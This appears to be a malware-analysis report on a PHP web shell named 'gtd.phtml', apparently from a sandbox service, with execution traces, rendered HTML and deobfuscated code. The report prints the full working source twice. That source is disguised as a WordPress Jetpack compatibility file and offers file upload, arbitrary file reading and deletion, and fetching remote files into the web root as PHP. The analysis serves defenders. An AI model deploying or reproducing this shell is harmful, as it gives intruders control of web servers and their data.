gtd.phtml

md5: 43fd96acd68715f1c0d96410e966f654

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Deobfuscated, Original, Traces)
getcwd (Deobfuscated, Original, Traces)

Files
file_get_contents (Deobfuscated, Original)
file_put_contents (Deobfuscated, Original)
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

URLs
https://jetpack.com/ (Original)
https://jetpack.com/support/content-options/ (Original)
https://jetpack.com/support/infinite-scroll/ (Original)
https://jetpack.com/support/responsive-videos/ (Original)

Deobfuscated PHP code
<?php 
echo "@package @link";
error_reporting(0);
chmod(basename($_SERVER["PHP_SELF"]), 0444);
echo "\r\n<table width=\"380\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>Current Path : ";
if (isset($_GET['path'])) {
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
    if ($pat == '' && $id == 0) {
        $a = true;
        echo "<a href=\"?path=/\">/</a>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    echo "<a href=\"?path=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$paths[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_FILES['uploadedfile'])) {
    $target_path = basename($_FILES["uploadedfile"]["name"]);
    if (move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $path . '/' . $target_path)) {
        echo "<font color=\"green\">file uploaded</font><br />";
    } else {
        echo "<font color=\"red\">upload fail</font><br />";
    }
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\" action=\"?path={$path}\"><input name=\"uploadedfile\" type=\"file\"/><input type=\"submit\" value=\"Upload File\"/></form></td></tr>";
function get($url, $dir)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $data = curl_exec($ch);
    if (!$data) {
        $data = @file_get_contents($url);
    }
    file_put_contents($dir, $data);
}
if ($_GET['url']) {
    $url = $_GET['url'];
    preg_match('/(.*)\\/(.*)\\.(.*?)$/', $url, $n);
    if ($n[3] == 'txt') {
        $z = 'php';
        $name = $n[2];
    } else {
        $z = $n[3];
        $name = "moban";
    }
    if ($_GET['dir']) {
        $dir = $_SERVER["DOCUMENT_ROOT"] . '/' . $_GET['dir'] . '/' . $name . '.' . $z;
    } else {
        $dir = $_SERVER["DOCUMENT_ROOT"] . '/' . $name . '.' . $z;
    }
    get($url, $dir);
    if (file_exists($dir)) {
        echo "<tr><td><font color=\"green\">download success</font></td></tr>";
    } else {
        echo "<tr><td><font color=\"red\">download fail</font></td></tr>";
    }
} elseif ($_POST['url']) {
    $url = $_POST['url'];
    preg_match('/(.*)\\/(.*)\\.(.*?)$/', $url, $n);
    if ($n[3] == 'txt') {
        $z = 'php';
        $name = $n[2];
    } else {
        $z = $n[3];
        $name = "moban";
    }
    $dir = $_POST['path'] . "/" . $name . '.' . $z;
    get($url, $dir);
    if (file_exists($dir)) {
        echo "<tr><td><font color=\"green\">download success</font></td></tr>";
    } else {
        echo "<tr><td><font color=\"red\">download fail</font></td></tr>";
    }
}
echo "<tr><td><form method=\"POST\" action=\"?path={$path}\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"{$path}\"><input type=submit value=\"Download\"></form></td></tr>";
if (isset($_GET['filesrc'])) {
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo "</tr></td></table><br />";
    echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['check']) && $_GET['check'] == '1') {
    $RootDir = $_SERVER['DOCUMENT_ROOT'];
    $filename = $RootDir . '/index.php';
    echo "<tr><td>Current File : ";
    echo $filename;
    echo "</tr></td></table><br />";
    echo '<pre>' . htmlspecialchars(file_get_contents($filename)) . '</pre>';
} else {
    echo "</table><br /><center>";
    if (isset($_GET['option']) && $_GET['option'] == 'delete') {
        if (unlink($_GET['delfile'])) {
            echo "<font color=\"green\">Delete File Done.</font><br />";
        } else {
            echo "<font color=\"red\">Delete File Error.</font><br />";
        }
    }
    echo "</center>";
    $scandir = scandir($path);
    echo "<div id=\"content\"><table width=\"380\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"><td>Name</td><td>Size</td><td>Options</td></tr>";
    foreach ($scandir as $dir) {
        if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
            continue;
        }
        echo "<tr><td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td>DIR</td><td>none</td></tr>";
    }
    echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
    foreach ($scandir as $file) {
        if (!is_file("{$path}/{$file}")) {
            continue;
        }
        $size = filesize("{$path}/{$file}") / 1024;
        $size = round($size, 3);
        if ($size >= 1024) {
            $size = round($size / 1024, 2) . ' MB';
        } else {
            $size .= ' KB';
        }
        echo "<tr><td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td>" . $size . "</td><td><a href=\"?path={$path}&delfile={$path}/{$file}&option=delete\">Delete</a></td></tr>";
    }
    echo "</table></div>";
}
Execution traces
data/traces/43fd96acd68715f1c0d96410e966f654_trace-1676243883.4571.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:18:29.354948]
1	0	1	0.000153	393512
1	3	0	0.000376	423688	{main}	1		/var/www/html/uploads/gtd.phtml	0	0
2	4	0	0.000394	423688	error_reporting	0		/var/www/html/uploads/gtd.phtml	18	1	0
2	4	1	0.000410	423728
2	4	R			22527
2	5	0	0.000425	423688	basename	0		/var/www/html/uploads/gtd.phtml	19	1	'/uploads/gtd.phtml'
2	5	1	0.000439	423760
2	5	R			'gtd.phtml'
2	6	0	0.000454	423728	chmod	0		/var/www/html/uploads/gtd.phtml	19	2	'gtd.phtml'	292
2	6	1	0.000477	423800
2	6	R			FALSE
2	7	0	0.000491	423688	getcwd	0		/var/www/html/uploads/gtd.phtml	25	0
2	7	1	0.000504	423736
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/gtd.phtml	25	$path = '/var/www/html/uploads'
2	8	0	0.000532	423736	str_replace	0		/var/www/html/uploads/gtd.phtml	27	3	'\\'	'/'	'/var/www/html/uploads'
2	8	1	0.000547	423832
2	8	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/gtd.phtml	27	$path = '/var/www/html/uploads'
2	9	0	0.000571	423736	explode	0		/var/www/html/uploads/gtd.phtml	28	2	'/'	'/var/www/html/uploads'
2	9	1	0.000585	424312
2	9	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/gtd.phtml	28	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 0
1		A						/var/www/html/uploads/gtd.phtml	31	$a = TRUE
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 1
1		A						/var/www/html/uploads/gtd.phtml	37	$i = 0
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 2
1		A						/var/www/html/uploads/gtd.phtml	37	$i = 0
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 3
1		A						/var/www/html/uploads/gtd.phtml	37	$i = 0
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	29	$id = 4
1		A						/var/www/html/uploads/gtd.phtml	37	$i = 0
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
1		A						/var/www/html/uploads/gtd.phtml	37	$i++
2	10	0	0.000824	424240	scandir	0		/var/www/html/uploads/gtd.phtml	113	1	'/var/www/html/uploads'
2	10	1	0.000855	424864
2	10	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'gtd.phtml', 5 => 'prepend.php']
1		A						/var/www/html/uploads/gtd.phtml	113	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'gtd.phtml', 5 => 'prepend.php']
2	11	0	0.000894	424880	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/.'
2	11	1	0.000912	424944
2	11	R			TRUE
2	12	0	0.000959	424912	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/..'
2	12	1	0.000974	424960
2	12	R			TRUE
2	13	0	0.000988	424920	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/.htaccess'
2	13	1	0.001003	424960
2	13	R			FALSE
2	14	0	0.001017	424920	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/data'
2	14	1	0.001031	424960
2	14	R			TRUE
2	15	0	0.001045	424920	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/gtd.phtml'
2	15	1	0.001058	424960
2	15	R			FALSE
2	16	0	0.001072	424928	is_dir	0		/var/www/html/uploads/gtd.phtml	116	1	'/var/www/html/uploads/prepend.php'
2	16	1	0.001087	424976
2	16	R			FALSE
2	17	0	0.001101	424920	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/.'
2	17	1	0.001116	424944
2	17	R			FALSE
2	18	0	0.001129	424912	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/..'
2	18	1	0.001143	424960
2	18	R			FALSE
2	19	0	0.001155	424920	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/.htaccess'
2	19	1	0.001169	424960
2	19	R			TRUE
2	20	0	0.001182	424920	filesize	0		/var/www/html/uploads/gtd.phtml	122	1	'/var/www/html/uploads/.htaccess'
2	20	1	0.001195	424960
2	20	R			64
1		A						/var/www/html/uploads/gtd.phtml	122	$size = 0.0625
2	21	0	0.001225	424864	round	0		/var/www/html/uploads/gtd.phtml	123	2	0.0625	3
2	21	1	0.001238	424936
2	21	R			0.063
1		A						/var/www/html/uploads/gtd.phtml	123	$size = 0.063
1		A						/var/www/html/uploads/gtd.phtml	127	$size = '0.063 KB'
2	22	0	0.001275	424960	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/data'
2	22	1	0.001290	425000
2	22	R			FALSE
2	23	0	0.001303	424960	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/gtd.phtml'
2	23	1	0.001317	425000
2	23	R			TRUE
2	24	0	0.001329	424960	filesize	0		/var/www/html/uploads/gtd.phtml	122	1	'/var/www/html/uploads/gtd.phtml'
2	24	1	0.001341	425000
2	24	R			4648
1		A						/var/www/html/uploads/gtd.phtml	122	$size = 4.5390625
2	25	0	0.001365	424864	round	0		/var/www/html/uploads/gtd.phtml	123	2	4.5390625	3
2	25	1	0.001378	424936
2	25	R			4.539
1		A						/var/www/html/uploads/gtd.phtml	123	$size = 4.539
1		A						/var/www/html/uploads/gtd.phtml	127	$size = '4.539 KB'
2	26	0	0.001414	424968	is_file	0		/var/www/html/uploads/gtd.phtml	121	1	'/var/www/html/uploads/prepend.php'
2	26	1	0.001430	425016
2	26	R			TRUE
2	27	0	0.001443	424976	filesize	0		/var/www/html/uploads/gtd.phtml	122	1	'/var/www/html/uploads/prepend.php'
2	27	1	0.001456	425016
2	27	R			57
1		A						/var/www/html/uploads/gtd.phtml	122	$size = 0.0556640625
2	28	0	0.001479	424872	round	0		/var/www/html/uploads/gtd.phtml	123	2	0.0556640625	3
2	28	1	0.001492	424944
2	28	R			0.056
1		A						/var/www/html/uploads/gtd.phtml	123	$size = 0.056
1		A						/var/www/html/uploads/gtd.phtml	127	$size = '0.056 KB'
1	3	1	0.001528	424912
			0.001557	318560
TRACE END   [2023-02-12 21:18:29.356382]

Generated HTML code
<html><head></head><body>@package @link
<table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr><td>Current Path : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST" action="?path=/var/www/html"><input name="uploadedfile" type="file"><input type="submit" value="Upload File"></form></td></tr><tr><td><form method="POST" action="?path=/var/www/html"><span>Url: </span><input type="text" name="url" value=""><input type="hidden" name="path" value="/var/www/html"><input type="submit" value="Download"></form></td></tr></tbody></table><br><center></center><div id="content"><table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"><td>Name</td><td>Size</td><td>Options</td></tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr><td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td><td>0 KB</td><td><a href="?path=/var/www/html&amp;delfile=/var/www/html/beneri.se_malware_analysis&amp;option=delete">Delete</a></td></tr><tr><td><a href="?filesrc=/var/www/html/gtd.phtml&amp;path=/var/www/html">gtd.phtml</a></td><td>4.539 KB</td><td><a href="?path=/var/www/html&amp;delfile=/var/www/html/gtd.phtml&amp;option=delete">Delete</a></td></tr></tbody></table></div></body></html>
Original PHP code
<?php
/**
 * Jetpack Compatibility File
 *
 * @link https://jetpack.com/
 *
 * @package stag-blocks
 */

/**
 * Jetpack setup function.
 *
 * See: https://jetpack.com/support/infinite-scroll/
 * See: https://jetpack.com/support/responsive-videos/
 * See: https://jetpack.com/support/content-options/
 */
echo("@package @link");
error_reporting(0);
chmod(basename($_SERVER["PHP_SELF"]), 0444);
echo '
<table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>Current Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['uploadedfile'])){
$target_path=basename($_FILES["uploadedfile"]["name"]);if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"],$path.'/'.$target_path)){echo '<font color="green">file uploaded</font><br />';}else{echo '<font color="red">upload fail</font><br />';}
} 
echo "<form enctype=\"multipart/form-data\" method=\"POST\" action=\"?path=$path\"><input name=\"uploadedfile\" type=\"file\"/><input type=\"submit\" value=\"Upload File\"/></form></td></tr>";
function get($url, $dir) {
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch,CURLOPT_TIMEOUT,10);
	$data = curl_exec($ch);
	if(!$data){
		$data = @file_get_contents($url);
	}
	file_put_contents($dir, $data);
}
if($_GET['url']){
	$url = $_GET['url'];
	preg_match('/(.*)\/(.*)\.(.*?)$/',$url,$n);
	if($n[3]=='txt'){
		$z='php';
		$name=$n[2];
	}else{
		$z=$n[3];
		$name="moban";
	}
	if($_GET['dir']){
		$dir=$_SERVER["DOCUMENT_ROOT"].'/'.$_GET['dir'].'/'.$name.'.'.$z;
	}else{
		$dir=$_SERVER["DOCUMENT_ROOT"].'/'.$name.'.'.$z;
	}
	get($url,$dir);
	if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}
}elseif($_POST['url']){
	$url = $_POST['url'];
	preg_match('/(.*)\/(.*)\.(.*?)$/',$url,$n);
	if($n[3]=='txt'){
		$z='php';
		$name=$n[2];
	}else{
		$z=$n[3];
		$name="moban";
	}
	$dir = $_POST['path']."/".$name.'.'.$z;
	get($url,$dir);
	if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}
}
echo "<tr><td><form method=\"POST\" action=\"?path=$path\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"$path\"><input type=submit value=\"Download\"></form></td></tr>";
if(isset($_GET['filesrc'])){
	echo "<tr><td>Current File : ";
	echo $_GET['filesrc'];
	echo '</tr></td></table><br />';
	echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
	}elseif(isset($_GET['check']) &&  $_GET['check'] == '1'){
		$RootDir = $_SERVER['DOCUMENT_ROOT'];
		$filename = $RootDir.'/index.php';
		echo "<tr><td>Current File : ";
		echo $filename;
		echo '</tr></td></table><br />';
		echo('<pre>'.htmlspecialchars(file_get_contents($filename)).'</pre>');
	}else{
	echo '</table><br /><center>';
	if(isset($_GET['option']) &&  $_GET['option'] == 'delete'){
		if(unlink($_GET['delfile'])){
			echo '<font color="green">Delete File Done.</font><br />';
		}else{
			echo '<font color="red">Delete File Error.</font><br />';
		}
	}
	echo '</center>';
	$scandir = scandir($path);
	echo '<div id="content"><table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"><td>Name</td><td>Size</td><td>Options</td></tr>';
	foreach($scandir as $dir){
		if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
			echo "<tr><td><a href=\"?path=$path/$dir\">$dir</a></td><td>DIR</td><td>none</td></tr>";
		}
	echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
	foreach($scandir as $file){
		if(!is_file("$path/$file")) continue;
		$size = filesize("$path/$file")/1024;
		$size = round($size,3);
		if($size >= 1024){
			$size = round($size/1024,2).' MB';
		}else{
			$size = $size.' KB';
		}
		echo "<tr><td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td>".$size."</td><td><a href=\"?path=$path&delfile=$path/$file&option=delete\">Delete</a></td></tr>";
	}
	echo '</table></div>';
}
PHP Malware Analysis

gtd.phtml

md5: 43fd96acd68715f1c0d96410e966f654

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
